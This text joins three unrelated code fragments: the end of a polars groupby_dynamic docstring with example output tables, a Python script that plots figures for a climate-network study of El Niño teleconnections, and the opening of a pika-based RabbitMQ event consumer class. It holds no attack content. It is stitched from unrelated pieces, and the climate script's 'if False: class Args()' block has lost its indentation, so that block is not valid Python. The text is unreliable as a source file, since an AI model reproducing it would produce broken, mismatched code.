├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 02:30:00 ┆ 5 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 6 │
└─────────────────────┴─────┘
Group by windows of 1 hour starting at 2021-12-16 00:00:00.
>>> (
... df.groupby_dynamic("time", every="1h").agg(
... [
... pl.col("time").min().alias("time_min"),
... pl.col("time").max().alias("time_max"),
... ]
... )
... )
shape: (3, 3)
┌─────────────────────┬─────────────────────┬─────────────────────┐
│ time ┆ time_min ┆ time_max │
│ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] │
╞═════════════════════╪═════════════════════╪═════════════════════╡
│ 2021-12-16 00:00:00 ┆ 2021-12-16 00:30:00 ┆ 2021-12-16 01:00:00 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2021-12-16 01:30:00 ┆ 2021-12-16 02:00:00 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2021-12-16 02:30:00 ┆ 2021-12-16 03:00:00 │
└─────────────────────┴─────────────────────┴─────────────────────┘
The window boundaries can also be added to the aggregation result
>>> (
... df.groupby_dynamic("time", every="1h", include_boundaries=True).agg(
... [pl.col("time").count().alias("time_count")]
... )
... )
shape: (3, 4)
┌─────────────────────┬─────────────────────┬─────────────────────┬────────────┐
│ _lower_boundary ┆ _upper_boundary ┆ time ┆ time_count │
│ --- ┆ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] ┆ u32 │
╞═════════════════════╪═════════════════════╪═════════════════════╪════════════╡
│ 2021-12-16 00:00:00 ┆ 2021-12-16 01:00:00 ┆ 2021-12-16 00:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2021-12-16 02:00:00 ┆ 2021-12-16 01:00:00 ┆ 2 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2021-12-16 03:00:00 ┆ 2021-12-16 02:00:00 ┆ 2 │
└─────────────────────┴─────────────────────┴─────────────────────┴────────────┘
When closed="left", should not include right end of interval [lower_bound, upper_bound)
>>> (
... df.groupby_dynamic("time", every="1h", closed="left").agg(
... [
... pl.col("time").count().alias("time_count"),
... pl.col("time").list().alias("time_agg_list"),
... ]
... )
... )
shape: (4, 3)
┌─────────────────────┬────────────┬─────────────────────────────────────┐
│ time ┆ time_count ┆ time_agg_list │
│ --- ┆ --- ┆ --- │
│ datetime[ns] ┆ u32 ┆ list [datetime[ns]] │
╞═════════════════════╪════════════╪═════════════════════════════════════╡
│ 2021-12-16 00:00:00 ┆ 2 ┆ [2021-12-16 00:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 2 ┆ [2021-12-16 01:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 2 ┆ [2021-12-16 02:00:00, 2021-12-16... │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 1 ┆ [2021-12-16 03:00:00] │
└─────────────────────┴────────────┴─────────────────────────────────────┘
When closed="both" the time values at the window boundaries belong to 2 groups.
>>> (
... df.groupby_dynamic("time", every="1h", closed="both").agg(
... [pl.col("time").count().alias("time_count")]
... )
... )
shape: (4, 2)
┌─────────────────────┬────────────┐
│ time ┆ time_count │
│ --- ┆ --- │
│ datetime[ns] ┆ u32 │
╞═════════════════════╪════════════╡
│ 2021-12-16 00:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ 3 │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ 1 │
└─────────────────────┴────────────┘
Dynamic groupbys can also be combined with grouping on normal keys
>>> df = pl.DataFrame(
... {
... "time": pl.date_range(
... low=datetime(2021, 12, 16),
... high=datetime(2021, 12, 16, 3),
... interval="30m",
... ),
... "groups": ["a", "a", "a", "b", "b", "a", "a"],
... }
... )
>>> df
shape: (7, 2)
┌─────────────────────┬────────┐
│ time ┆ groups │
│ --- ┆ --- │
│ datetime[ns] ┆ str │
╞═════════════════════╪════════╡
│ 2021-12-16 00:00:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 00:30:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:00:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 01:30:00 ┆ b │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:00:00 ┆ b │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 02:30:00 ┆ a │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┼╌╌╌╌╌╌╌╌┤
│ 2021-12-16 03:00:00 ┆ a │
└─────────────────────┴────────┘
>>> (
... df.groupby_dynamic(
... "time",
... every="1h",
... closed="both",
... by="groups",
... include_boundaries=True,
... ).agg([pl.col("time").count().alias("time_count")])
... )
shape: (6, 5)
┌────────┬─────────────────────┬─────────────────────┬─────────────────────┬────────────┐
│ groups ┆ _lower_boundary ┆ _upper_boundary ┆ time ┆ time_count │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ datetime[ns] ┆ datetime[ns] ┆ datetime[ns] ┆ u32 │
╞════════╪═════════════════════╪═════════════════════╪═════════════════════╪════════════╡
│ a ┆ 2021-12-16 00:00:00 ┆ 2021-12-16 01:00:00 ┆ 2021-12-16 00:00:00 ┆ 3 | |
"""
Reproducing figures of the paper.
"""
# %%
import copy
import os
import argparse
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sn
import cartopy.crs as ccrs
from importlib import reload
from climnet.dataset import AnomalyDataset
from climnet.network import clim_networkx
import climnet.plots as cplt
import climnet.utils.spatial_utils as sputils
import utils as ut
PATH = os.path.dirname(os.path.abspath(__file__))
# plt.style.use('paperplot.mplstyle')
def make_argparser():
    """Build the command-line argument parser for this script.

    All options are optional strings defaulting to None: the dataset path
    plus the three network .graphml file paths (EP, CP, normal).
    """
    parser = argparse.ArgumentParser()
    # (short flag, long flag, help text) for each option; all share
    # default=None and type=str.
    options = [
        ("-data", "--dataset",
         "Path to t2m dataset file regridded on equidistant grid."),
        ("-ep", "--epNetwork",
         "Filepath of EP network .graphml."),
        ("-cp", "--cpNetwork",
         "Filepath of CP network .graphml."),
        ("-normal", "--normalNetwork",
         "Filepath of normal network .graphml."),
    ]
    for short_flag, long_flag, help_text in options:
        parser.add_argument(short_flag, long_flag, default=None, type=str,
                            help=(help_text))
    return parser
# True to run with ipython
if False:
class Args():
"""Workaround of argsparser."""
def __init__(self) -> None:
self.dataset = PATH + "/../data/t2m_fekete_grid_2.5_1950-2020.nc"
self.epNetwork = PATH + \
'/../outputs/t2m_1950-2020_nino_nets/t2m_Nino_EP_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
self.cpNetwork = PATH + \
'/../outputs/t2m_1950-2020_nino_nets/t2m_Nino_CP_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
self.normalNetwork = PATH + \
'/../outputs/t2m_1950-2020_nino_nets/t2m_standard_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
args = Args()
else:
parser = make_argparser()
args = parser.parse_args()
# %%
# Load dataset corresponding to the networks
ds = AnomalyDataset(load_nc=args.dataset)
# %%
# Load Enso Index
fname = PATH + "/../data/ersst5.nino.mth.91-20.ascii"
nino_indices = ut.get_nino_indices(
fname, time_range=[ds.ds.time[0].data, ds.ds.time[-1].data], time_roll=0)
enso_dict = ut.get_enso_years(nino_indices, month_range=[12, 2],
mean=True, threshold=0.5,
min_diff=0.1,
drop_volcano_year=False)
# %%
# Load EP, CP, standard network
nino_networks = [
{'name': 'standard',
'title': 'Normal',
'file': args.normalNetwork},
{'name': 'Nino_EP',
'title': 'EP',
'file': args.epNetwork},
{'name': 'Nino_CP',
'title': 'CP',
'file': args.cpNetwork},
]
for net in nino_networks:
# naming of net files
season_type = net['name']
time_period = enso_dict[season_type]
ds_tmp = copy.deepcopy(ds)
ds_tmp.use_time_snippets(time_period)
# Load networks
net['cnx'] = clim_networkx.Clim_NetworkX(dataset=ds_tmp,
nx_path_file=net['file']
)
# Normalize curvature
net['cnx'].normalize_edge_attr(attributes=['formanCurvature'])
# Get quantiles
q_vals = [0.1, 0.9]
net['cnx'].get_node_attr_q(
edge_attrs=['formanCurvature',
'formanCurvature_norm'],
q_values=q_vals, norm=True
)
# Get link length distribution of quantiles
ll = {}
for q in [None]+q_vals:
print(f'Compute link length q={q}')
link_length = net['cnx'].get_link_length_distribution(
q=q, var='formanCurvature')
ll[q] = link_length
net['ll'] = ll
# %%
##########################################################################################
# Figure 2
##########################################################################################
# 3x3 panel figure: one column per network (Normal / EP / CP).
# Row 0: link-length histograms; rows 1-2: maps of the links in the upper
# (q>0.9, red) and lower (q<0.1, blue) curvature quantiles.
figsize = (11, 5)
ncols = 3
nrows = 3
num_links = 10  # subsampling step for plotted edges
var = 'formanCurvature'
q_vals = [None, 0.9, 0.1]
central_longitude = 0
fig = plt.figure(figsize=(figsize[0]*ncols, figsize[1]*nrows))
# Extra (4th) narrow column holds the vertical colorbars.
gs = fig.add_gridspec(nrows, ncols+1,
                      height_ratios=[20, 20, 20],
                      width_ratios=[15, 15, 15, 1],
                      hspace=.4, wspace=0.1)
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
ax3 = fig.add_subplot(gs[0, 2])
ax4 = fig.add_subplot(gs[1, 0],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax7 = fig.add_subplot(gs[2, 0],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax5 = fig.add_subplot(gs[1, 1],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax8 = fig.add_subplot(gs[2, 1],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax6 = fig.add_subplot(gs[1, 2],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax9 = fig.add_subplot(gs[2, 2],
                      projection=ccrs.EqualEarth(central_longitude=central_longitude))
# axes[idx] = [histogram, q>0.9 map, q<0.1 map] for network idx.
axes = np.array([[ax1, ax4, ax7],
                 [ax2, ax5, ax8],
                 [ax3, ax6, ax9]])
cmaps = ['Reds', 'Blues']
mrks = ['o', 'x']
colors = ['r', 'b']
labels = ['All', f'q>{q_vals[1]}', f'q<{q_vals[2]}']
for idx, nino in enumerate(nino_networks):
    axs = axes[idx]
    cnx = nino['cnx']
    season_type = nino['name']
    np_net_files = []  # NOTE(review): appears unused below
    link_length_0 = nino['ll'][q_vals[0]]
    link_length_pos = nino['ll'][q_vals[1]]
    link_length_neg = nino['ll'][q_vals[2]]
    link_lengths = [
        link_length_0,
        link_length_pos,
        link_length_neg,
    ]
    # Map panels: edges + scatter of link counts for both quantiles.
    for i, q in enumerate(q_vals[1:]):
        el = cnx.get_q_edge_list(var, q=q)[0::num_links]
        link_map = cnx.get_el_map(el=el, binary=False)
        cplt.plot_edges(ds, list(el),
                        ax=axs[i+1],
                        significant_mask=True,
                        projection='EqualEarth',
                        central_longitude=central_longitude,
                        plt_grid=True,
                        lw=0.08,
                        alpha=.7,
                        color=colors[i])
        im_nino = cplt.plot_map(ds, link_map,
                                projection='EqualEarth', plt_grid=True,
                                ax=axs[i+1],
                                plot_type='scatter',
                                significant_mask=True,
                                cmap=cmaps[i], levels=2,
                                vmin=0, vmax=3e1,
                                marker='o',
                                title=' ',
                                bar=False,
                                alpha=.5,
                                size=5,
                                fillstyle='none',
                                central_longitude=central_longitude)
        # One shared colorbar per row, created only for the first network.
        if idx == 0:
            ax_cbar = fig.add_subplot(gs[i+1, 3], )
            cbar = plt.colorbar(im_nino['im'], cax=ax_cbar, orientation='vertical',
                                label=f'# Links to node ({labels[i+1]})',
                                )
    # Histogram panel: y-axis labels/ticks only in the leftmost column.
    if idx == 0:
        ylabel = 'counts'
        yticks = True
    else:
        ylabel = None
        yticks = False
    cplt.plot_hist(link_lengths,
                   ax=axs[0],
                   density=False,
                   # nbins=100,
                   bw=150,  # km bin width
                   xlim=(0.1, 2.1e4),
                   ylim=(1e1, 1e5),
                   log=False,
                   ylog=True,
                   bar=False,
                   label_arr=labels,
                   xlabel='link length [km]',
                   ylabel=ylabel,
                   figsize=(9, 5),
                   loc='upper right',
                   color_arr=['k', 'tab:red', 'tab:blue'],
                   yticks=yticks,
                   title=nino['title'],
                   sci=3)
cplt.enumerate_subplots(axes.T, pos_x=-0.1, pos_y=1.07)
# %%
##########################################################################################
# Figure 3
##########################################################################################
# One column per network; rows 0-1: maps of upper/lower node-curvature
# quantiles; bottom row: zonal (meridional) profiles on a split axis
# (axlat1 left, axlat2 right) with a broken-axis marker between them.
m_name = 'norm'
# Per-network plotting limits for the two node-curvature quantile fields.
net_measures = {
    'standard': [dict(var='formanCurvature_norm_q0.9',
                      vmin=.5,
                      vmax=.6,
                      vmin_zonal=.42,
                      vmax_zonal=.55,
                      cmap='Reds', label=r"$\tilde{f}_i^+$"),
                 dict(var='formanCurvature_norm_q0.1',
                      vmin=-.25,
                      vmax=-.07,
                      vmin_zonal=None,
                      vmax_zonal=.0,
                      cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
                 ],
    'Nino_EP': [dict(var='formanCurvature_norm_q0.9',
                     vmin=.23,
                     vmax=.37,
                     vmin_zonal=None,
                     vmax_zonal=None,
                     cmap='Reds', label=r"$\tilde{f}_i^+$"),
                dict(var='formanCurvature_norm_q0.1',
                     vmin=-.5,
                     vmax=-.4,
                     vmin_zonal=None,
                     vmax_zonal=None,
                     cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
                ],
    'Nino_CP': [dict(var='formanCurvature_norm_q0.9',
                     vmin=.53,
                     vmax=.63,
                     vmin_zonal=None,
                     vmax_zonal=None,
                     cmap='Reds', label=r"$\tilde{f}_i^+$"),
                dict(var='formanCurvature_norm_q0.1',
                     vmin=-.26,
                     vmax=-.16,
                     vmin_zonal=-.3,
                     vmax_zonal=None,
                     cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
                ],
}
fig = plt.figure(figsize=(len(net_measures)*7, 15))
gs = gridspec.GridSpec(3, len(net_measures),
                       height_ratios=[3, 3, 4],
                       hspace=0.3, wspace=0.3)
axs = []
clrs = ['darkred', 'darkblue']
for j, nino in enumerate(nino_networks):
    net_measure = net_measures[nino['name']]
    axlat1 = fig.add_subplot(gs[-1, j])
    axlat1 = cplt.prepare_axis(axlat1,
                               xlabel=r'zonal median',
                               ylabel='latitude',
                               xlabel_pos='right',
                               )
    # Second (right) half of the broken zonal-profile axis.
    divider = make_axes_locatable(axlat1)
    axlat2 = divider.new_horizontal(size="100%", pad=0.2)
    fig.add_axes(axlat2)
    for i, m in enumerate(net_measure):
        axmap = fig.add_subplot(gs[i, j],
                                projection=ccrs.EqualEarth(central_longitude=180))
        cplt.plot_map(ds, nino['cnx'].ds_nx[m['var']],
                      ax=axmap,
                      plot_type='contourf',
                      cmap=m['cmap'], label=f"node curvature {m['label']}",
                      projection='EqualEarth',
                      plt_grid=True,
                      significant_mask=True,
                      levels=8,
                      tick_step=2,
                      vmin=m['vmin'],
                      vmax=m['vmax'],
                      sci=None,
                      round_dec=3,
                      central_longitude=180,
                      orientation='horizontal',
                      pad='20%'
                      )
        axs.append(axmap)
        # Interpolate the Fibonacci grid to a Gaussian grid for the
        # zonal statistics below.
        da = sputils.interp_fib2gaus(
            nino['cnx'].ds_nx[m['var']],
            grid_step=ds.grid_step
        )
        # Fill masked cells with the field's min (upper quantile) or max
        # (lower quantile) so they do not bias the zonal statistics.
        if i == 0:
            da = xr.where(~np.isnan(da), da, da.min())
            axmap.set_title(nino['title'])
        else:
            da = xr.where(~np.isnan(da), da, da.max())
        # NOTE(review): the zonal median computed here is immediately
        # overwritten by the mean on the next line, and the 0.25/0.75
        # quantiles are never used below -- confirm intent before removal.
        zonal_mean = sputils.compute_meridional_quantile(da, q=0.5)
        zonal_mean, zonal_std = sputils.compute_meridional_mean(da)
        zonal_low_quantile = sputils.compute_meridional_quantile(da, q=0.25)
        zonal_up_quantile = sputils.compute_meridional_quantile(da, q=0.75)
        # Upper quantile goes on the right half, lower on the left half;
        # shaded band is mean +/- std/2.
        if i == 0:
            cplt.prepare_axis(axlat2)
            im = axlat2.plot(zonal_mean, zonal_mean['lat'],
                             color=clrs[i], label=f"{m['label']}")
            axlat2.fill_betweenx(zonal_mean['lat'],
                                 zonal_mean - zonal_std/2,
                                 zonal_mean + zonal_std/2,
                                 color=im[0].get_color(),
                                 alpha=0.5)
            axlat2.set_xlim(m['vmin_zonal'], m['vmax_zonal'])
            cplt.place_legend(axlat2,
                              fontsize=14,
                              loc='upper right',
                              )
        else:
            im = axlat1.plot(zonal_mean, zonal_mean['lat'],
                             color=clrs[i], label=f"{m['label']}")
            axlat1.fill_betweenx(zonal_mean['lat'],
                                 zonal_mean - zonal_std/2,
                                 zonal_mean + zonal_std/2,
                                 color=im[0].get_color(),
                                 alpha=0.5)
            axlat1.set_xlim(m['vmin_zonal'], m['vmax_zonal'])
            cplt.place_legend(axlat1,
                              fontsize=14,
                              loc='upper left',
                              )
    # hide the spines between ax and axlat2
    axlat1.spines['right'].set_visible(False)
    axlat2.spines['left'].set_visible(False)
    axlat1.yaxis.tick_left()
    axlat1.tick_params(labelright=False, right=False)
    axlat2.tick_params(labelleft=False, left=False)
    d = .015  # how big to make the diagonal lines in axes coordinates
    # arguments to pass plot, just so we don't keep repeating them
    kwargs_ax = dict(transform=axlat1.transAxes,
                     color='k', clip_on=False)
    axlat1.plot((1-d, 1+d), (-d, +d), **kwargs_ax)
    # axlat.plot((1-d, 1+d), (1-d, 1+d), **kwargs_ax)
    # switch to the bottom axes
    kwargs_ax.update(transform=axlat2.transAxes)
    axlat2.plot((-d, +d), (-d, +d), **kwargs_ax)
    # axlat2.plot((-d, +d), (1-d, 1+d), **kwargs_ax)
    axlat1.set_yticks([-60, -30, 0, 30, 60])
    axlat1.set_yticklabels([r'$60^\circ$S', r'$30^\circ$S', r'$0^\circ$',
                            r'$30^\circ$N', r'$60^\circ$N'])
    axs.append(axlat1)
cplt.enumerate_subplots(np.array(axs).reshape(
    len(net_measures), 3).T, pos_x=-0.1, pos_y=1.08)
# %%
##########################################################################################
# Fig 4. Combine regions in one plot
##########################################################################################
# For four source regions, plot where the lower-curvature-quantile (q=0.1)
# links from each region go, overlaying two networks per panel.
q = 0.1
attribute = f'formanCurvature'
locations = [
    dict(name='NINO3', lon=[-150, -90], lat=[-5, 5],
         central_lon=180, link_step=4, vmax=1E2),
    dict(name='NINO4', lon=[160, -150], lat=[-5, 5],
         central_lon=180, link_step=1, vmax=1E2),
    dict(name='IO', lon=[60, 100], lat=[-20, 10],
         central_lon=100, link_step=5, vmax=1E2),
    dict(name='Labrador sea', lon=[-100, -40], lat=[50, 80],
         central_lon=-40, link_step=2, vmax=1E2),
]
# create fig.
colors = ['darkmagenta', 'darkgreen']
cmap = ['RdPu', 'Greens']
mrks = ['o', 'x']
binary = False
alpha = 0.5
fig = plt.figure(figsize=(15, 10))
# 2x2 map panels plus a bottom row of two horizontal colorbars.
gs = fig.add_gridspec(3, 2, height_ratios=[20, 20, 1],
                      hspace=0.1, wspace=0.1)
axs = []
for i, loc in enumerate(locations):
    ax = fig.add_subplot(
        gs[int(i/2), int(i % 2)],
        projection=ccrs.EqualEarth(central_longitude=loc['central_lon'])
    )
    ax.set_global()
    axs.append(ax)
    # NOTE(review): this overlays nino_networks[:2] (standard + EP), while
    # the colorbars below are labelled EP/CP -- verify the intended slice.
    for j, nino in enumerate(nino_networks[:2]):
        edge_dic = nino['cnx'].get_edges_nodes_for_region(
            lon_range=loc['lon'], lat_range=loc['lat'],
            attribute=attribute, q=q,
            binary=binary)
        if len(edge_dic['el']) == 0:
            continue
        attr = attribute if q is None else f"{attribute}_q{q}"
        # Plot nodes where edges go to
        if binary:
            im = cplt.plot_map(ds, edge_dic['target_map'],
                               ax=ax,
                               label=f'log(# Links)',
                               projection='EqualEarth', plt_grid=True,
                               plot_type='points', significant_mask=True,
                               marker=mrks[j],
                               size=2, color=colors[j],
                               fillstyle='none',
                               bar=False,
                               alpha=alpha,
                               )
        else:
            im = cplt.plot_map(ds, edge_dic['target_map'],
                               ax=ax,
                               label=f'# Teleconnections',
                               projection='EqualEarth', plt_grid=True,
                               plot_type='scatter', significant_mask=True,
                               cmap=cmap[j],
                               vmin=0, vmax=loc['vmax'],
                               bar=False,
                               alpha=alpha,
                               marker=mrks[j], size=10, fillstyle='none',
                               )
        # Keep handles for the shared colorbars created after the loop.
        if j == 0:
            im_ep = im
        elif j == 1:
            im_cp = im
        im = cplt.plot_edges(ds, edge_dic['el'][0::loc['link_step']],
                             ax=im['ax'],
                             significant_mask=True,
                             orientation='vertical',
                             projection='EqualEarth',
                             plt_grid=True,
                             lw=0.1,
                             alpha=0.6,
                             color=colors[j],
                             )
    # Outline the source region box (uses the last plotted panel handle).
    cplt.plot_rectangle(ax=im['ax'],
                        lon_range=loc['lon'],
                        lat_range=loc['lat'],
                        color='k',
                        lw=3)
# Colorbar
ax = fig.add_subplot(gs[-1, 0])
cbar = plt.colorbar(im_ep['im'], cax=ax, orientation='horizontal',
                    shrink=0.8, label='# Teleconnections (EP)')
ax = fig.add_subplot(gs[-1, 1])
cbar = plt.colorbar(im_cp['im'], cax=ax, orientation='horizontal',
                    shrink=0.8, label='# Teleconnections (CP)')
cplt.enumerate_subplots(np.array(axs), fontsize=24)
plt.tight_layout()
# %%
##########################################################################################
# Figure 5
# Linear Regression Coefficient analysis
##########################################################################################
# One map per (region, network) pair showing the mean rank-normalized
# linear-regression coefficient of anomalies against the region's nodes.
reload(cplt)
reload(ut)
attribute = f'formanCurvature'
locations = [
    # dict(name='Eastern Pacific', lon=[-145, -80], lat=[-10, 10],
    #      central_lon=180, link_step=7, vmax=1E2),
    # dict(name='Central Pacific', lon=[160, -145], lat=[-10, 10],
    #      central_lon=180, link_step=1, vmax=1E2),
    dict(name=rf'$Ni\~no$ 3', lon=[-150, -90], lat=[-5, 5],
         central_lon=180, link_step=4, vmax=1E2),
    dict(name=rf'$Ni\~no$ 4', lon=[160, -150], lat=[-5, 5],
         central_lon=180, link_step=1, vmax=1E2),
    dict(name='Indian Ocean', lon=[60, 100], lat=[-20, 10],
         central_lon=100, link_step=5, vmax=1E2),
    # dict(name='PO', lon=[-170, -120], lat=[40, 70],
    #      central_lon=180, link_step=3, vmax=1E2),
    dict(name='Labrador Sea', lon=[-100, -40], lat=[50, 80],
         central_lon=-40, link_step=2, vmax=1E2),
    # dict(name='Northern Atlantic', lon=[-10, 40], lat=[50, 70],
    #      central_lon=0, link_step=3, vmax=1E2),
]
method = 'rank'
# 4 regions x 2 networks -> 4x2 grid of panels.
nrows = 4
ncols = 2
im = cplt.create_multi_map_plot_gs(nrows=nrows, ncols=ncols,
                                   central_longitude=180,
                                   figsize=(9, 6),
                                   orientation='horizontal',
                                   )
lr_range = .4  # symmetric color range for the regression coefficient
# for i, loc in enumerate(locations):
for i, loc in enumerate(locations):
    for j, nino in enumerate([nino_networks[0],
                              nino_networks[1]]):
        link_dict = nino['cnx'].get_edges_nodes_for_region(
            lon_range=loc['lon'], lat_range=loc['lat'],
        )
        var = 'anomalies'
        sids = link_dict['sids'][:]
        da_lr = ut.get_LR_map(ds=nino['cnx'].ds,
                              var=var,
                              sids=sids,
                              method=method)
        # Average the per-node regression maps over all region nodes.
        im_comp = cplt.plot_map(ds,
                                da_lr.mean(dim='sids'),
                                ax=im['ax'][i*ncols + j],
                                plot_type='contourf',
                                cmap='RdBu_r',
                                title=f'{loc["name"]} ({nino["name"]})',
                                projection='EqualEarth',
                                plt_grid=True,
                                significant_mask=False,
                                levels=14,
                                tick_step=2,
                                round_dec=2,
                                vmin=-lr_range,
                                vmax=lr_range,
                                bar=False,
                                )
        cplt.plot_rectangle(ax=im['ax'][i*ncols + j],
                            lon_range=loc['lon'],
                            lat_range=loc['lat'],
                            color='k',
                            lw=4)
label = f'{method}-normalized Linear Regression coefficient'
# Shared discrete colorbar (all panels use the same vmin/vmax).
cbar = cplt.make_colorbar_discrete(ax=im['ax'][-1],
                                   im=im_comp['im'],
                                   set_cax=False,
                                   orientation='horizontal',
                                   vmin=-lr_range,
                                   vmax=lr_range,
                                   label=label,
                                   extend='both',
                                   round_dec=2,
                                   )
# %%
#######################################################
# Figures for Supporting Information
#######################################################
net_measures = {
'degree': dict(vmin=0, vmax=None, cmap='Oranges', label="Deg(v)"),
'betweenness': dict(vmin=0, vmax=0.003, cmap='Greys', label=f"log(BC(v)) + 1"),
'clustering': dict(vmin=0.3, vmax=0.7, cmap='Greens', label="Clust. Coeff."),
'formanCurvature_norm': dict(vmin=None, vmax=None,
cmap='coolwarm', label=f"Forman Curv. norm"),
# 'formanCurvature': dict(vmin=-4e2, vmax=1E2,
# cmap='coolwarm', label=f"Forman Curv."),
# 'formanCurvature_rank': dict(vmin=0, vmax=1,
# cmap='coolwarm', label=f"Forman Curv. rank"),
# 'formanCurvature_q0.9': dict(vmin=0, vmax=10,
| |
<filename>amqpconsumer/events.py
import logging
import pika
import json
logger = logging.getLogger(__name__)
class EventConsumer(object):
"""Basic consumer with event loop for RabbitMQ events.
It takes an event handler that will be given all events from the provided
queue. If the handler raises an exception, the run()-method that runs the
event loop will stop with that exception. To then gracefully shut down the
connection to RabbitMQ, call stop().
Messages that are not valid JSON will be ignored.
Based on the async consumer example from the pika docs:
https://pika.readthedocs.org/en/latest/examples/asynchronous_consumer_example.html
Usage:
>>> def handler(event):
>>>     print(event)
>>> c = EventConsumer('amqp://rabbitmq.example.com:6782/vhost', 'myqueue', handler)
>>> try:
>>> c.run() # Will run the event loop, passing each event into handler()
>>> except KeyboardInterrupt:
>>> c.stop() # Gracefully disconnect from RabbitMQ
"""
# This class will string together all the async callbacks that are needed
# before consuming. The flow is this:
#
# connect -> on_connection_open ->
# open_channel -> on_channel_open ->
# setup_exchange -> on_exchange_declareok -> (these 2 are skipped if no exchange is provided)
# setup_queue -> on_queue_declareok ->
# on_bindok (skipped if no exchange is provided) ->
# start_consuming
def __init__(self, amqp_url, queue, handler, exchange=None, exchange_type=None, routing_key=None):
"""Create a new instance of the consumer class, passing in the URL
of RabbitMQ, the queue to listen to, and a callable handler that
handles the events.
The queue will be declared before consuming. If exchange, exchange_type,
and routing_key are provided, it will also declare the exchange and bind
the queue to it. Queue and exchange will be declared durable.
:param str amqp_url: The AMQP url to connect with
:param str queue: The queue to listen to
:param function handler: The event handler that handles events
:param str exchange: Optional name of exchange to declare
:param str exchange_type: Optional type of exchange to declare
